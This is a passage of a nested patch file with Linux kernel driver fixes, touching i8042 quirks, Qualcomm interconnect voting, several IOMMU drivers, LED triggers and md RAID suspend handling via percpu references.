+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
+ 					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
+ 	},
++	/* See comment on TUXEDO InfinityBook S17 Gen6 / Clevo NS70MU above */
++	{
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "PD5x_7xPNP_PNR_PNN_PNT"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOAUX)
++	},
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "X170SM"),
+diff --git a/drivers/interconnect/qcom/bcm-voter.c b/drivers/interconnect/qcom/bcm-voter.c
+index d5f2a6b5376bd..a2d437a05a11f 100644
+--- a/drivers/interconnect/qcom/bcm-voter.c
++++ b/drivers/interconnect/qcom/bcm-voter.c
+@@ -58,6 +58,36 @@ static u64 bcm_div(u64 num, u32 base)
+ 	return num;
+ }
+ 
++/* BCMs with enable_mask use one-hot-encoding for on/off signaling */
++static void bcm_aggregate_mask(struct qcom_icc_bcm *bcm)
++{
++	struct qcom_icc_node *node;
++	int bucket, i;
++
++	for (bucket = 0; bucket < QCOM_ICC_NUM_BUCKETS; bucket++) {
++		bcm->vote_x[bucket] = 0;
++		bcm->vote_y[bucket] = 0;
++
++		for (i = 0; i < bcm->num_nodes; i++) {
++			node = bcm->nodes[i];
++
++			/* If any vote in this bucket exists, keep the BCM enabled */
++			if (node->sum_avg[bucket] || node->max_peak[bucket]) {
++				bcm->vote_x[bucket] = 0;
++				bcm->vote_y[bucket] = bcm->enable_mask;
++				break;
++			}
++		}
++	}
++
++	if (bcm->keepalive) {
++		bcm->vote_x[QCOM_ICC_BUCKET_AMC] = bcm->enable_mask;
++		bcm->vote_x[QCOM_ICC_BUCKET_WAKE] = bcm->enable_mask;
++		bcm->vote_y[QCOM_ICC_BUCKET_AMC] = bcm->enable_mask;
++		bcm->vote_y[QCOM_ICC_BUCKET_WAKE] = bcm->enable_mask;
++	}
++}
++
+ static void bcm_aggregate(struct qcom_icc_bcm *bcm)
+ {
+ 	struct qcom_icc_node *node;
+@@ -83,11 +113,6 @@ static void bcm_aggregate(struct qcom_icc_bcm *bcm)
+ 
+ 		temp = agg_peak[bucket] * bcm->vote_scale;
+ 		bcm->vote_y[bucket] = bcm_div(temp, bcm->aux_data.unit);
+-
+-		if (bcm->enable_mask && (bcm->vote_x[bucket] || bcm->vote_y[bucket])) {
+-			bcm->vote_x[bucket] = 0;
+-			bcm->vote_y[bucket] = bcm->enable_mask;
+-		}
+ 	}
+ 
+ 	if (bcm->keepalive && bcm->vote_x[QCOM_ICC_BUCKET_AMC] == 0 &&
+@@ -260,8 +285,12 @@ int qcom_icc_bcm_voter_commit(struct bcm_voter *voter)
+ 		return 0;
+ 
+ 	mutex_lock(&voter->lock);
+-	list_for_each_entry(bcm, &voter->commit_list, list)
+-		bcm_aggregate(bcm);
++	list_for_each_entry(bcm, &voter->commit_list, list) {
++		if (bcm->enable_mask)
++			bcm_aggregate_mask(bcm);
++		else
++			bcm_aggregate(bcm);
++	}
+ 
+ 	/*
+ 	 * Pre sort the BCMs based on VCD for ease of generating a command list
+diff --git a/drivers/interconnect/qcom/qcm2290.c b/drivers/interconnect/qcom/qcm2290.c
+index a29cdb4fac03f..82a2698ad66b1 100644
+--- a/drivers/interconnect/qcom/qcm2290.c
++++ b/drivers/interconnect/qcom/qcm2290.c
+@@ -1355,6 +1355,7 @@ static struct platform_driver qcm2290_noc_driver = {
+ 	.driver = {
+ 		.name = "qnoc-qcm2290",
+ 		.of_match_table = qcm2290_noc_of_match,
++		.sync_state = icc_sync_state,
+ 	},
+ };
+ module_platform_driver(qcm2290_noc_driver);
+diff --git a/drivers/interconnect/qcom/sm8450.c b/drivers/interconnect/qcom/sm8450.c
+index e64c214b40209..d6e582a02e628 100644
+--- a/drivers/interconnect/qcom/sm8450.c
++++ b/drivers/interconnect/qcom/sm8450.c
+@@ -1886,6 +1886,7 @@ static struct platform_driver qnoc_driver = {
+ 	.driver = {
+ 		.name = "qnoc-sm8450",
+ 		.of_match_table = qnoc_of_match,
++		.sync_state = icc_sync_state,
+ 	},
+ };
+ 
+diff --git a/drivers/iommu/amd/iommu_v2.c b/drivers/iommu/amd/iommu_v2.c
+index 75355ddca6575..4caa023048a08 100644
+--- a/drivers/iommu/amd/iommu_v2.c
++++ b/drivers/iommu/amd/iommu_v2.c
+@@ -262,8 +262,8 @@ static void put_pasid_state(struct pasid_state *pasid_state)
+ 
+ static void put_pasid_state_wait(struct pasid_state *pasid_state)
+ {
+-	refcount_dec(&pasid_state->count);
+-	wait_event(pasid_state->wq, !refcount_read(&pasid_state->count));
++	if (!refcount_dec_and_test(&pasid_state->count))
++		wait_event(pasid_state->wq, !refcount_read(&pasid_state->count));
+ 	free_pasid_state(pasid_state);
+ }
+ 
+diff --git a/drivers/iommu/arm/arm-smmu/qcom_iommu.c b/drivers/iommu/arm/arm-smmu/qcom_iommu.c
+index 3869c3ecda8cd..5b9cb9fcc352b 100644
+--- a/drivers/iommu/arm/arm-smmu/qcom_iommu.c
++++ b/drivers/iommu/arm/arm-smmu/qcom_iommu.c
+@@ -273,6 +273,13 @@ static int qcom_iommu_init_domain(struct iommu_domain *domain,
+ 			ctx->secure_init = true;
+ 		}
+ 
++		/* Disable context bank before programming */
++		iommu_writel(ctx, ARM_SMMU_CB_SCTLR, 0);
++
++		/* Clear context bank fault address fault status registers */
++		iommu_writel(ctx, ARM_SMMU_CB_FAR, 0);
++		iommu_writel(ctx, ARM_SMMU_CB_FSR, ARM_SMMU_FSR_FAULT);
++
+ 		/* TTBRs */
+ 		iommu_writeq(ctx, ARM_SMMU_CB_TTBR0,
+ 				pgtbl_cfg.arm_lpae_s1_cfg.ttbr |
+diff --git a/drivers/iommu/intel/pasid.c b/drivers/iommu/intel/pasid.c
+index a39aab66a01b1..3f03039e5cce5 100644
+--- a/drivers/iommu/intel/pasid.c
++++ b/drivers/iommu/intel/pasid.c
+@@ -127,7 +127,7 @@ int intel_pasid_alloc_table(struct device *dev)
+ 	info->pasid_table = pasid_table;
+ 
+ 	if (!ecap_coherent(info->iommu->ecap))
+-		clflush_cache_range(pasid_table->table, size);
++		clflush_cache_range(pasid_table->table, (1 << order) * PAGE_SIZE);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/iommu/mtk_iommu.c b/drivers/iommu/mtk_iommu.c
+index 2ae5a6058a34a..9673cd60c84fc 100644
+--- a/drivers/iommu/mtk_iommu.c
++++ b/drivers/iommu/mtk_iommu.c
+@@ -223,10 +223,9 @@ struct mtk_iommu_data {
+ 	struct device			*smicomm_dev;
+ 
+ 	struct mtk_iommu_bank_data	*bank;
++	struct mtk_iommu_domain		*share_dom; /* For 2 HWs share pgtable */
+ 
+-	struct dma_iommu_mapping	*mapping; /* For mtk_iommu_v1.c */
+ 	struct regmap			*pericfg;
+-
+ 	struct mutex			mutex; /* Protect m4u_group/m4u_dom above */
+ 
+ 	/*
+@@ -577,15 +576,14 @@ static int mtk_iommu_domain_finalise(struct mtk_iommu_domain *dom,
+ 				     struct mtk_iommu_data *data,
+ 				     unsigned int region_id)
+ {
++	struct mtk_iommu_domain	*share_dom = data->share_dom;
+ 	const struct mtk_iommu_iova_region *region;
+-	struct mtk_iommu_domain	*m4u_dom;
+-
+-	/* Always use bank0 in sharing pgtable case */
+-	m4u_dom = data->bank[0].m4u_dom;
+-	if (m4u_dom) {
+-		dom->iop = m4u_dom->iop;
+-		dom->cfg = m4u_dom->cfg;
+-		dom->domain.pgsize_bitmap = m4u_dom->cfg.pgsize_bitmap;
++
++	/* Always use share domain in sharing pgtable case */
++	if (MTK_IOMMU_HAS_FLAG(data->plat_data, SHARE_PGTABLE) && share_dom) {
++		dom->iop = share_dom->iop;
++		dom->cfg = share_dom->cfg;
++		dom->domain.pgsize_bitmap = share_dom->cfg.pgsize_bitmap;
+ 		goto update_iova_region;
+ 	}
+ 
+@@ -615,6 +613,9 @@ static int mtk_iommu_domain_finalise(struct mtk_iommu_domain *dom,
+ 	/* Update our support page sizes bitmap */
+ 	dom->domain.pgsize_bitmap = dom->cfg.pgsize_bitmap;
+ 
++	if (MTK_IOMMU_HAS_FLAG(data->plat_data, SHARE_PGTABLE))
++		data->share_dom = dom;
++
+ update_iova_region:
+ 	/* Update the iova region for this domain */
+ 	region = data->plat_data->iova_region + region_id;
+@@ -665,7 +666,9 @@ static int mtk_iommu_attach_device(struct iommu_domain *domain,
+ 		/* Data is in the frstdata in sharing pgtable case. */
+ 		frstdata = mtk_iommu_get_frst_data(hw_list);
+ 
++		mutex_lock(&frstdata->mutex);
+ 		ret = mtk_iommu_domain_finalise(dom, frstdata, region_id);
++		mutex_unlock(&frstdata->mutex);
+ 		if (ret) {
+ 			mutex_unlock(&dom->mutex);
+ 			return -ENODEV;
+diff --git a/drivers/iommu/rockchip-iommu.c b/drivers/iommu/rockchip-iommu.c
+index f7e9b56be174f..43bb577a26e59 100644
+--- a/drivers/iommu/rockchip-iommu.c
++++ b/drivers/iommu/rockchip-iommu.c
+@@ -98,8 +98,6 @@ struct rk_iommu_ops {
+ 	phys_addr_t (*pt_address)(u32 dte);
+ 	u32 (*mk_dtentries)(dma_addr_t pt_dma);
+ 	u32 (*mk_ptentries)(phys_addr_t page, int prot);
+-	phys_addr_t (*dte_addr_phys)(u32 addr);
+-	u32 (*dma_addr_dte)(dma_addr_t dt_dma);
+ 	u64 dma_bit_mask;
+ };
+ 
+@@ -277,8 +275,8 @@ static u32 rk_mk_pte(phys_addr_t page, int prot)
+ /*
+  * In v2:
+  * 31:12 - Page address bit 31:0
+- *  11:9 - Page address bit 34:32
+- *   8:4 - Page address bit 39:35
++ * 11: 8 - Page address bit 35:32
++ *  7: 4 - Page address bit 39:36
+  *     3 - Security
+  *     2 - Writable
+  *     1 - Readable
+@@ -505,7 +503,7 @@ static int rk_iommu_force_reset(struct rk_iommu *iommu)
+ 
+ 	/*
+ 	 * Check if register DTE_ADDR is working by writing DTE_ADDR_DUMMY
+-	 * and verifying that upper 5 nybbles are read back.
++	 * and verifying that upper 5 (v1) or 7 (v2) nybbles are read back.
+ 	 */
+ 	for (i = 0; i < iommu->num_mmu; i++) {
+ 		dte_addr = rk_ops->pt_address(DTE_ADDR_DUMMY);
+@@ -530,33 +528,6 @@ static int rk_iommu_force_reset(struct rk_iommu *iommu)
+ 	return 0;
+ }
+ 
+-static inline phys_addr_t rk_dte_addr_phys(u32 addr)
+-{
+-	return (phys_addr_t)addr;
+-}
+-
+-static inline u32 rk_dma_addr_dte(dma_addr_t dt_dma)
+-{
+-	return dt_dma;
+-}
+-
+-#define DT_HI_MASK GENMASK_ULL(39, 32)
+-#define DTE_BASE_HI_MASK GENMASK(11, 4)
+-#define DT_SHIFT   28
+-
+-static inline phys_addr_t rk_dte_addr_phys_v2(u32 addr)
+-{
+-	u64 addr64 = addr;
+-	return (phys_addr_t)(addr64 & RK_DTE_PT_ADDRESS_MASK) |
+-	       ((addr64 & DTE_BASE_HI_MASK) << DT_SHIFT);
+-}
+-
+-static inline u32 rk_dma_addr_dte_v2(dma_addr_t dt_dma)
+-{
+-	return (dt_dma & RK_DTE_PT_ADDRESS_MASK) |
+-	       ((dt_dma & DT_HI_MASK) >> DT_SHIFT);
+-}
+-
+ static void log_iova(struct rk_iommu *iommu, int index, dma_addr_t iova)
+ {
+ 	void __iomem *base = iommu->bases[index];
+@@ -576,7 +547,7 @@ static void log_iova(struct rk_iommu *iommu, int index, dma_addr_t iova)
+ 	page_offset = rk_iova_page_offset(iova);
+ 
+ 	mmu_dte_addr = rk_iommu_read(base, RK_MMU_DTE_ADDR);
+-	mmu_dte_addr_phys = rk_ops->dte_addr_phys(mmu_dte_addr);
++	mmu_dte_addr_phys = rk_ops->pt_address(mmu_dte_addr);
+ 
+ 	dte_addr_phys = mmu_dte_addr_phys + (4 * dte_index);
+ 	dte_addr = phys_to_virt(dte_addr_phys);
+@@ -966,7 +937,7 @@ static int rk_iommu_enable(struct rk_iommu *iommu)
+ 
+ 	for (i = 0; i < iommu->num_mmu; i++) {
+ 		rk_iommu_write(iommu->bases[i], RK_MMU_DTE_ADDR,
+-			       rk_ops->dma_addr_dte(rk_domain->dt_dma));
++			       rk_ops->mk_dtentries(rk_domain->dt_dma));
+ 		rk_iommu_base_command(iommu->bases[i], RK_MMU_CMD_ZAP_CACHE);
+ 		rk_iommu_write(iommu->bases[i], RK_MMU_INT_MASK, RK_MMU_IRQ_MASK);
+ 	}
+@@ -1373,8 +1344,6 @@ static struct rk_iommu_ops iommu_data_ops_v1 = {
+ 	.pt_address = &rk_dte_pt_address,
+ 	.mk_dtentries = &rk_mk_dte,
+ 	.mk_ptentries = &rk_mk_pte,
+-	.dte_addr_phys = &rk_dte_addr_phys,
+-	.dma_addr_dte = &rk_dma_addr_dte,
+ 	.dma_bit_mask = DMA_BIT_MASK(32),
+ };
+ 
+@@ -1382,8 +1351,6 @@ static struct rk_iommu_ops iommu_data_ops_v2 = {
+ 	.pt_address = &rk_dte_pt_address_v2,
+ 	.mk_dtentries = &rk_mk_dte_v2,
+ 	.mk_ptentries = &rk_mk_pte_v2,
+-	.dte_addr_phys = &rk_dte_addr_phys_v2,
+-	.dma_addr_dte = &rk_dma_addr_dte_v2,
+ 	.dma_bit_mask = DMA_BIT_MASK(40),
+ };
+ 
+diff --git a/drivers/iommu/sprd-iommu.c b/drivers/iommu/sprd-iommu.c
+index fadd2c907222b..8261066de07d7 100644
+--- a/drivers/iommu/sprd-iommu.c
++++ b/drivers/iommu/sprd-iommu.c
+@@ -147,6 +147,7 @@ static struct iommu_domain *sprd_iommu_domain_alloc(unsigned int domain_type)
+ 
+ 	dom->domain.geometry.aperture_start = 0;
+ 	dom->domain.geometry.aperture_end = SZ_256M - 1;
++	dom->domain.geometry.force_aperture = true;
+ 
+ 	return &dom->domain;
+ }
+diff --git a/drivers/irqchip/irq-loongson-eiointc.c b/drivers/irqchip/irq-loongson-eiointc.c
+index ac04aeaa2d308..3d99b8bdd8ef1 100644
+--- a/drivers/irqchip/irq-loongson-eiointc.c
++++ b/drivers/irqchip/irq-loongson-eiointc.c
+@@ -145,7 +145,7 @@ static int eiointc_router_init(unsigned int cpu)
+ 	int i, bit;
+ 	uint32_t data;
+ 	uint32_t node = cpu_to_eio_node(cpu);
+-	uint32_t index = eiointc_index(node);
++	int index = eiointc_index(node);
+ 
+ 	if (index < 0) {
+ 		pr_err("Error: invalid nodemap!\n");
+diff --git a/drivers/leds/led-class-multicolor.c b/drivers/leds/led-class-multicolor.c
+index e317408583df9..ec62a48116135 100644
+--- a/drivers/leds/led-class-multicolor.c
++++ b/drivers/leds/led-class-multicolor.c
+@@ -6,6 +6,7 @@
+ #include <linux/device.h>
+ #include <linux/init.h>
+ #include <linux/led-class-multicolor.h>
++#include <linux/math.h>
+ #include <linux/module.h>
+ #include <linux/slab.h>
+ #include <linux/uaccess.h>
+@@ -19,9 +20,10 @@ int led_mc_calc_color_components(struct led_classdev_mc *mcled_cdev,
+ 	int i;
+ 
+ 	for (i = 0; i < mcled_cdev->num_colors; i++)
+-		mcled_cdev->subled_info[i].brightness = brightness *
+-					mcled_cdev->subled_info[i].intensity /
+-					led_cdev->max_brightness;
++		mcled_cdev->subled_info[i].brightness =
++			DIV_ROUND_CLOSEST(brightness *
++					  mcled_cdev->subled_info[i].intensity,
++					  led_cdev->max_brightness);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/leds/led-core.c b/drivers/leds/led-core.c
+index 4a97cb7457888..aad8bc44459fe 100644
+--- a/drivers/leds/led-core.c
++++ b/drivers/leds/led-core.c
+@@ -419,15 +419,15 @@ int led_compose_name(struct device *dev, struct led_init_data *init_data,
+ 	struct fwnode_handle *fwnode = init_data->fwnode;
+ 	const char *devicename = init_data->devicename;
+ 
+-	/* We want to label LEDs that can produce full range of colors
+-	 * as RGB, not multicolor */
+-	BUG_ON(props.color == LED_COLOR_ID_MULTI);
+-
+ 	if (!led_classdev_name)
+ 		return -EINVAL;
+ 
+ 	led_parse_fwnode_props(dev, fwnode, &props);
+ 
++	/* We want to label LEDs that can produce full range of colors
++	 * as RGB, not multicolor */
++	BUG_ON(props.color == LED_COLOR_ID_MULTI);
++
+ 	if (props.label) {
+ 		/*
+ 		 * If init_data.devicename is NULL, then it indicates that
+diff --git a/drivers/leds/leds-pwm.c b/drivers/leds/leds-pwm.c
+index 6832180c1c54f..cc892ecd52408 100644
+--- a/drivers/leds/leds-pwm.c
++++ b/drivers/leds/leds-pwm.c
+@@ -146,7 +146,7 @@ static int led_pwm_create_fwnode(struct device *dev, struct led_pwm_priv *priv)
+ 			led.name = to_of_node(fwnode)->name;
+ 
+ 		if (!led.name) {
+-			ret = EINVAL;
++			ret = -EINVAL;
+ 			goto err_child_out;
+ 		}
+ 
+diff --git a/drivers/leds/trigger/ledtrig-tty.c b/drivers/leds/trigger/ledtrig-tty.c
+index f62db7e520b52..8ae0d2d284aff 100644
+--- a/drivers/leds/trigger/ledtrig-tty.c
++++ b/drivers/leds/trigger/ledtrig-tty.c
+@@ -7,6 +7,8 @@
+ #include <linux/tty.h>
+ #include <uapi/linux/serial.h>
+ 
++#define LEDTRIG_TTY_INTERVAL	50
++
+ struct ledtrig_tty_data {
+ 	struct led_classdev *led_cdev;
+ 	struct delayed_work dwork;
+@@ -122,17 +124,19 @@ static void ledtrig_tty_work(struct work_struct *work)
+ 
+ 	if (icount.rx != trigger_data->rx ||
+ 	    icount.tx != trigger_data->tx) {
+-		led_set_brightness_sync(trigger_data->led_cdev, LED_ON);
++		unsigned long interval = LEDTRIG_TTY_INTERVAL;
++
++		led_blink_set_oneshot(trigger_data->led_cdev, &interval,
++				      &interval, 0);
+ 
+ 		trigger_data->rx = icount.rx;
+ 		trigger_data->tx = icount.tx;
+-	} else {
+-		led_set_brightness_sync(trigger_data->led_cdev, LED_OFF);
+ 	}
+ 
+ out:
+ 	mutex_unlock(&trigger_data->mutex);
+-	schedule_delayed_work(&trigger_data->dwork, msecs_to_jiffies(100));
++	schedule_delayed_work(&trigger_data->dwork,
++			      msecs_to_jiffies(LEDTRIG_TTY_INTERVAL * 2));
+ }
+ 
+ static struct attribute *ledtrig_tty_attrs[] = {
+diff --git a/drivers/md/md-bitmap.c b/drivers/md/md-bitmap.c
+index 8bbeeec70905c..5200bba63708e 100644
+--- a/drivers/md/md-bitmap.c
++++ b/drivers/md/md-bitmap.c
+@@ -2481,6 +2481,10 @@ backlog_store(struct mddev *mddev, const char *buf, size_t len)
+ 	if (backlog > COUNTER_MAX)
+ 		return -EINVAL;
+ 
++	rv = mddev_lock(mddev);
++	if (rv)
++		return rv;
++
+ 	/*
+ 	 * Without write mostly device, it doesn't make sense to set
+ 	 * backlog for max_write_behind.
+@@ -2494,6 +2498,7 @@ backlog_store(struct mddev *mddev, const char *buf, size_t len)
+ 	if (!has_write_mostly) {
+ 		pr_warn_ratelimited("%s: can't set backlog, no write mostly device available\n",
+ 				    mdname(mddev));
++		mddev_unlock(mddev);
+ 		return -EINVAL;
+ 	}
+ 
+@@ -2504,13 +2509,13 @@ backlog_store(struct mddev *mddev, const char *buf, size_t len)
+ 			mddev_destroy_serial_pool(mddev, NULL, false);
+ 	} else if (backlog && !mddev->serial_info_pool) {
+ 		/* serial_info_pool is needed since backlog is not zero */
+-		struct md_rdev *rdev;
+-
+ 		rdev_for_each(rdev, mddev)
+ 			mddev_create_serial_pool(mddev, rdev, false);
+ 	}
+ 	if (old_mwb != backlog)
+ 		md_bitmap_update_sb(mddev->bitmap);
++
++	mddev_unlock(mddev);
+ 	return len;
+ }
+ 
+diff --git a/drivers/md/md-linear.c b/drivers/md/md-linear.c
+index 6e7797b4e7381..4eb72b9dd9336 100644
+--- a/drivers/md/md-linear.c
++++ b/drivers/md/md-linear.c
+@@ -223,7 +223,8 @@ static bool linear_make_request(struct mddev *mddev, struct bio *bio)
+ 		     bio_sector < start_sector))
+ 		goto out_of_bounds;
+ 
+-	if (unlikely(is_mddev_broken(tmp_dev->rdev, "linear"))) {
++	if (unlikely(is_rdev_broken(tmp_dev->rdev))) {
++		md_error(mddev, tmp_dev->rdev);
+ 		bio_io_error(bio);
+ 		return true;
+ 	}
+@@ -270,6 +271,16 @@ static void linear_status (struct seq_file *seq, struct mddev *mddev)
+ 	seq_printf(seq, " %dk rounding", mddev->chunk_sectors / 2);
+ }
+ 
++static void linear_error(struct mddev *mddev, struct md_rdev *rdev)
++{
++	if (!test_and_set_bit(MD_BROKEN, &mddev->flags)) {
++		char *md_name = mdname(mddev);
++
++		pr_crit("md/linear%s: Disk failure on %pg detected, failing array.\n",
++			md_name, rdev->bdev);
++	}
++}
++
+ static void linear_quiesce(struct mddev *mddev, int state)
+ {
+ }
+@@ -286,6 +297,7 @@ static struct md_personality linear_personality =
+ 	.hot_add_disk	= linear_add,
+ 	.size		= linear_size,
+ 	.quiesce	= linear_quiesce,
++	.error_handler	= linear_error,
+ };
+ 
+ static int __init linear_init (void)
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 45daba0eb9310..86b2acfba1a7f 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -368,6 +368,10 @@ EXPORT_SYMBOL_GPL(md_new_event);
+ static LIST_HEAD(all_mddevs);
+ static DEFINE_SPINLOCK(all_mddevs_lock);
+ 
++static bool is_md_suspended(struct mddev *mddev)
++{
++	return percpu_ref_is_dying(&mddev->active_io);
++}
+ /* Rather than calling directly into the personality make_request function,
+  * IO requests come here first so that we can check if the device is
+  * being suspended pending a reconfiguration.
+@@ -377,7 +381,7 @@ static DEFINE_SPINLOCK(all_mddevs_lock);
+  */
+ static bool is_suspended(struct mddev *mddev, struct bio *bio)
+ {
+-	if (mddev->suspended)
++	if (is_md_suspended(mddev))
+ 		return true;
+ 	if (bio_data_dir(bio) != WRITE)
+ 		return false;
+@@ -393,12 +397,10 @@ static bool is_suspended(struct mddev *mddev, struct bio *bio)
+ void md_handle_request(struct mddev *mddev, struct bio *bio)
+ {
+ check_suspended:
+-	rcu_read_lock();
+ 	if (is_suspended(mddev, bio)) {
+ 		DEFINE_WAIT(__wait);
+ 		/* Bail out if REQ_NOWAIT is set for the bio */
+ 		if (bio->bi_opf & REQ_NOWAIT) {
+-			rcu_read_unlock();
+ 			bio_wouldblock_error(bio);
+ 			return;
+ 		}
+@@ -407,23 +409,19 @@ check_suspended:
+ 					TASK_UNINTERRUPTIBLE);
+ 			if (!is_suspended(mddev, bio))
+ 				break;
+-			rcu_read_unlock();
+ 			schedule();
+-			rcu_read_lock();
+ 		}
+ 		finish_wait(&mddev->sb_wait, &__wait);
+ 	}
+-	atomic_inc(&mddev->active_io);
+-	rcu_read_unlock();
++	if (!percpu_ref_tryget_live(&mddev->active_io))
++		goto check_suspended;
+ 
+ 	if (!mddev->pers->make_request(mddev, bio)) {
+-		atomic_dec(&mddev->active_io);
+-		wake_up(&mddev->sb_wait);
++		percpu_ref_put(&mddev->active_io);
+ 		goto check_suspended;
+ 	}
+ 
+-	if (atomic_dec_and_test(&mddev->active_io) && mddev->suspended)
+-		wake_up(&mddev->sb_wait);
++	percpu_ref_put(&mddev->active_io);
+ }
+ EXPORT_SYMBOL(md_handle_request);
+ 
+@@ -471,11 +469,10 @@ void mddev_suspend(struct mddev *mddev)
+ 	lockdep_assert_held(&mddev->reconfig_mutex);
+ 	if (mddev->suspended++)
+ 		return;
+-	synchronize_rcu();
+ 	wake_up(&mddev->sb_wait);
+ 	set_bit(MD_ALLOW_SB_UPDATE, &mddev->flags);
+-	smp_mb__after_atomic();
+-	wait_event(mddev->sb_wait, atomic_read(&mddev->active_io) == 0);
++	percpu_ref_kill(&mddev->active_io);
++	wait_event(mddev->sb_wait, percpu_ref_is_zero(&mddev->active_io));
+ 	mddev->pers->quiesce(mddev, 1);
+ 	clear_bit_unlock(MD_ALLOW_SB_UPDATE, &mddev->flags);
+ 	wait_event(mddev->sb_wait, !test_bit(MD_UPDATING_SB, &mddev->flags));
+@@ -488,11 +485,14 @@ EXPORT_SYMBOL_GPL(mddev_suspend);
+ 
+ void mddev_resume(struct mddev *mddev)
+ {
+-	/* entred the memalloc scope from mddev_suspend() */
+-	memalloc_noio_restore(mddev->noio_flag);
+ 	lockdep_assert_held(&mddev->reconfig_mutex);
+ 	if (--mddev->suspended)
+ 		return;
++
++	/* entred the memalloc scope from mddev_suspend() */
++	memalloc_noio_restore(mddev->noio_flag);
++
++	percpu_ref_resurrect(&mddev->active_io);
+ 	wake_up(&mddev->sb_wait);
+ 	mddev->pers->quiesce(mddev, 0);
+ 
+@@ -671,7 +671,6 @@ void mddev_init(struct mddev *mddev)
+ 	timer_setup(&mddev->safemode_timer, md_safemode_timeout, 0);
+ 	atomic_set(&mddev->active, 1);
+ 	atomic_set(&mddev->openers, 0);
+-	atomic_set(&mddev->active_io, 0);
+ 	spin_lock_init(&mddev->lock);
+ 	atomic_set(&mddev->flush_pending, 0);
+ 	init_waitqueue_head(&mddev->sb_wait);
+@@ -5779,6 +5778,12 @@ static void md_safemode_timeout(struct timer_list *t)
+ }
+ 
+ static int start_dirty_degraded;
++static void active_io_release(struct percpu_ref *ref)
++{
++	struct mddev *mddev = container_of(ref, struct mddev, active_io);
++
++	wake_up(&mddev->sb_wait);
++}
+ 
+ int md_run(struct mddev *mddev)
+ {
+@@ -5859,10 +5864,15 @@ int md_run(struct mddev *mddev)
+ 		nowait = nowait && bdev_nowait(rdev->bdev);
+ 	}
+ 
++	err = percpu_ref_init(&mddev->active_io, active_io_release,
++				PERCPU_REF_ALLOW_REINIT, GFP_KERNEL);
++	if (err)
++		return err;
++
+ 	if (!bioset_initialized(&mddev->bio_set)) {
+ 		err = bioset_init(&mddev->bio_set, BIO_POOL_SIZE, 0, BIOSET_NEED_BVECS);
+ 		if (err)
+-			return err;
++			goto exit_active_io;
+ 	}
+ 	if (!bioset_initialized(&mddev->sync_set)) {
+ 		err = bioset_init(&mddev->sync_set, BIO_POOL_SIZE, 0, BIOSET_NEED_BVECS);
+@@ -6050,6 +6060,8 @@ abort:
+ 	bioset_exit(&mddev->sync_set);
+ exit_bio_set:
+ 	bioset_exit(&mddev->bio_set);
++exit_active_io:
++	percpu_ref_exit(&mddev->active_io);
+ 	return err;
+ }
+ EXPORT_SYMBOL_GPL(md_run);
+@@ -6238,7 +6250,7 @@ EXPORT_SYMBOL_GPL(md_stop_writes);
+ static void mddev_detach(struct mddev *mddev)
+ {
+ 	md_bitmap_wait_behind_writes(mddev);
+-	if (mddev->pers && mddev->pers->quiesce && !mddev->suspended) {
++	if (mddev->pers && mddev->pers->quiesce && !is_md_suspended(mddev)) {
+ 		mddev->pers->quiesce(mddev, 1);
+ 		mddev->pers->quiesce(mddev, 0);
+ 	}
+@@ -6265,6 +6277,10 @@ static void __md_stop(struct mddev *mddev)
+ 		mddev->to_remove = &md_redundancy_group;
+ 	module_put(pers->owner);
+ 	clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery);
++
++	percpu_ref_exit(&mddev->active_io);
++	bioset_exit(&mddev->bio_set);
++	bioset_exit(&mddev->sync_set);
+ }
+ 
+ void md_stop(struct mddev *mddev)
+@@ -6276,8 +6292,7 @@ void md_stop(struct mddev *mddev)
+ 	 */
+ 	__md_stop_writes(mddev);
+ 	__md_stop(mddev);
+-	bioset_exit(&mddev->bio_set);
+-	bioset_exit(&mddev->sync_set);
++	percpu_ref_exit(&mddev->writes_pending);
+ }
+ 
+ EXPORT_SYMBOL_GPL(md_stop);
+@@ -7845,9 +7860,6 @@ static void md_free_disk(struct gendisk *disk)
+ 	struct mddev *mddev = disk->private_data;
+ 
+ 	percpu_ref_exit(&mddev->writes_pending);
+-	bioset_exit(&mddev->bio_set);
+-	bioset_exit(&mddev->sync_set);
+-
+ 	mddev_free(mddev);
+ }
+ 
+@@ -7978,6 +7990,9 @@ void md_error(struct mddev *mddev, struct md_rdev *rdev)
+ 		return;
+ 	mddev->pers->error_handler(mddev, rdev);
+ 
++	if (mddev->pers->level == 0 || mddev->pers->level == LEVEL_LINEAR)
++		return;
++
+ 	if (mddev->degraded && !test_bit(MD_BROKEN, &mddev->flags))
+ 		set_bit(MD_RECOVERY_RECOVER, &mddev->recovery);
+ 	sysfs_notify_dirent_safe(rdev->sysfs_state);
+@@ -8548,7 +8563,7 @@ bool md_write_start(struct mddev *mddev, struct bio *bi)
+ 		return true;
+ 	wait_event(mddev->sb_wait,
+ 		   !test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags) ||
+-		   mddev->suspended);
++		   is_md_suspended(mddev));
+ 	if (test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags)) {
+ 		percpu_ref_put(&mddev->writes_pending);
+ 		return false;
+@@ -9276,7 +9291,7 @@ void md_check_recovery(struct mddev *mddev)
+ 		wake_up(&mddev->sb_wait);
+ 	}
+ 
+-	if (mddev->suspended)
++	if (is_md_suspended(mddev))
+ 		return;
+ 
+ 	if (mddev->bitmap)
+diff --git a/drivers/md/md.h b/drivers/md/md.h
+index b4e2d8b87b611..4f0b480974552 100644
+--- a/drivers/md/md.h
++++ b/drivers/md/md.h
+@@ -315,7 +315,7 @@ struct mddev {
+ 	unsigned long			sb_flags;
+ 
+ 	int				suspended;
+-	atomic_t			active_io;
++	struct percpu_ref		active_io;
+ 	int				ro;
+ 	int				sysfs_active; /* set when sysfs deletes
+ 						       * are happening, so run/
+@@ -790,15 +790,9 @@ extern void mddev_destroy_serial_pool(struct mddev *mddev, struct md_rdev *rdev,
+ struct md_rdev *md_find_rdev_nr_rcu(struct mddev *mddev, int nr);
